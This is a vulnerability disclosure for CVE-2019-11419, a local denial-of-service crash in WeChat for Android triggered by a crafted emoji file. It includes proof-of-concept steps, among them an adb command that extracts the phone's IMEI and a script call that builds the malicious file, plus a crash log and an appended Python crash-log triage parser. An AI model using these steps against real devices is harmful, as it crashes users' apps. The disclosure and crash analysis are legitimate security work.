CVE-2019-11419: DoS Wechat with an emoji
vcodec2_hls_filter in libvoipCodec_v7a.so in the WeChat application through 7.0.3 for Android allows attackers to cause a denial of service (application crash) by replacing an emoji file (under the /sdcard/tencent/MicroMsg directory) with a crafted .wxgf file. The content of the replacement must be derived from the phone’s IMEI. The crash occurs upon receiving a message that contains the replaced emoji.
This DoS bug was reported to Tencent, but they decided not to fix it because they do not consider it critical. The Common Vulnerabilities and Exposures (CVE) Program has assigned the ID CVE-2019-11419 to this issue.
Description:
vcodec2_hls_filter in libvoipCodec_v7a.so in the WeChat application for Android results in a DoS when an emoji file (under the /sdcard/tencent/MicroMsg directory) is replaced with a crafted .wxgf file. A crash log is provided in the poc.zip file at https://drive.google.com/open?id=1HFQtbD10awuUicdWoq3dKVKfv0wvxOKS
Vulnerability Type:
Denial of Service
Vendor of Product:
Tencent
Affected Product Code Base:
WeChat for Android - Up to latest version (7.0.3)
Affected Component:
Function vcodec2_hls_filter in libvoipCodec_v7a.so
Attack Type:
Local
Attack vector:
A malware app can craft a malicious emoji file and overwrite the emoji files under /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID]. Once the user opens any chat message that contains an emoji, WeChat crashes instantly.
POC:
Video at https://drive.google.com/open?id=1x1Z3hm4j8f4rhv_WUp4gW-bhdtZMezdU
The user must have sent or received a GIF file in WeChat.
The malware app must retrieve the phone’s IMEI. For the POC, the following command can be used:
adb shell service call iphonesubinfo 1 | awk -F "'" '{print $2}' | sed '1 d' | tr -d '.' | awk '{print}' ORS=-
Produce the malicious emoji file with the retrieved IMEI (use encrypt_wxgf.py in poc.zip):
python encrypt.py crash4.wxgf [SIZE_OF_EMOJI_ON_SDCARD]
Replace /sdcard/tencent/MicroMsg/[User_ID]/emoji/[WXGF_ID] with the padded out.wxgf.encrypted.
WeChat will now crash as soon as a message that contains the overwritten emoji file is received.
Crash log:
Process: com.tencent.mm
Crash Thread: 27374(total:122)
Date/Time: 2108-12-12 +8.00 13:34:50.135
Live Time: 35s
Device: Pixel 2 XL android-27
Exception info:
Siginfo: errno:0, pid:0, uid:0, process:
after unwind signal thread
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: google/taimen/taimen:8.1.0/OPM4.171019.021.R1/4833808:user/release-keys
pid: 27147, tid: 27374 >>> com.tencent.mm <<<
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000
after dump thread backtrace
#00 pc 0x0 <unknown> (???)
#01 pc 0x1f739b /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filter+546)
#02 pc 0x1f8efb /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filters+134)
#03 pc 0x1efa5d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#04 pc 0x1ea94f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_default_execute+30)
#05 pc 0x1f1c59 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (???)
#06 pc 0x1eaa49 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_decode_video2+120)
#07 pc 0x1e375d /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (Vcodec2DecodeMultipleNals+176)
#08 pc 0x1e510f /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::decodeColorComponents(unsigned char*, int)+70)
#09 pc 0x1e5791 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (CWxAMDecoder::add_buffer(unsigned char*, int, int, StWxAMFrame**)+228)
#10 pc 0x1e5995 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (wxam_dec_decode_buffer_3+12)
#11 pc 0x4c435 /data/app/com.tencent.mm-XUPZwNZyUC6RN4utDMIYMw==/lib/arm/libwechatcommon.so (Java_com_tencent_mm_plugin_gif_MMWXGFJNI_nativeDecodeBufferFrame+148)
...
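The crash log above is in the standard Android native-crash format, so the triage an analyst does by eye (which signal, which fault address, which symbolised frame made the bad call, and whether the WXGF emoji decoder is on the stack) can be automated. The following Python is an added example written for this page, not part of the original report or of poc.zip; it parses the log lines quoted above and flags the telltale pattern of frame #00 at pc 0x0 with fault addr 0, i.e. control transferred through a null pointer from vcodec2_hls_filter.

```python
import re

# Lines taken from the WeChat crash log above (Android native-crash format).
CRASH_LOG = """\
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000
#00 pc 0x0 <unknown> (???)
#01 pc 0x1f739b /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (vcodec2_hls_filter+546)
#06 pc 0x1eaa49 /data/data/com.tencent.mm/app_lib/libvoipCodec_v7a.so (v2codec_decode_video2+120)
#11 pc 0x4c435 /data/app/com.tencent.mm-XUPZwNZyUC6RN4utDMIYMw==/lib/arm/libwechatcommon.so (Java_com_tencent_mm_plugin_gif_MMWXGFJNI_nativeDecodeBufferFrame+148)
"""

SIGNAL_RE = re.compile(r"^signal \d+ \((\w+)\), code \d+ \((\w+)\), fault addr ([0-9a-fA-F]+)")
FRAME_RE = re.compile(r"^#(\d+)\s+pc\s+(0x[0-9a-fA-F]+)\s+(\S+)(?:\s+\((.*)\))?")

def parse_frames(log):
    """Parse '#NN pc 0xADDR module (symbol+offset)' lines into dicts."""
    frames = []
    for m in filter(None, map(FRAME_RE.match, log.splitlines())):
        num, pc, module, sym = m.groups()
        symbol, offset = None, None
        if sym and sym != "???":                 # '???' = symbol not resolved
            symbol, _, off = sym.rpartition("+")
            if symbol and off.isdigit():
                offset = int(off)
            else:                                # no '+offset' suffix
                symbol = sym
        frames.append({"num": int(num), "pc": int(pc, 16), "symbol": symbol,
                       "module": module.rsplit("/", 1)[-1], "offset": offset})
    return frames

def triage(log):
    """Summarise the signal, the fault address and the frame that caused it."""
    sig = next(filter(None, map(SIGNAL_RE.match, log.splitlines())), None)
    frames = parse_frames(log)
    fault_addr = int(sig.group(3), 16) if sig else None
    # Frame #00 at pc 0x0 means execution reached address 0 itself (a call or
    # jump through a null pointer); the first symbolised frame below it is the
    # caller, so that is the function to inspect in the binary.
    origin = next((f for f in frames if f["symbol"]), None)
    return {
        "signal": sig.group(1) if sig else None,
        "code": sig.group(2) if sig else None,
        "fault_addr": fault_addr,
        "pc_is_zero": bool(frames) and frames[0]["pc"] == 0,
        "null_pointer_fault": sig is not None and sig.group(1) == "SIGSEGV"
                              and fault_addr is not None and fault_addr < 0x1000,  # page 0
        "origin": (origin["module"], origin["symbol"], origin["offset"]) if origin else None,
        # The WXGF JNI entry point on the stack ties the crash to emoji decoding.
        "via_wxgf_decoder": any(f["symbol"] and "MMWXGFJNI" in f["symbol"] for f in frames),
    }
```

The same parser works on any Android tombstone backtrace, so it can be pointed at a directory of crash reports to find other instances of this decoder path failing.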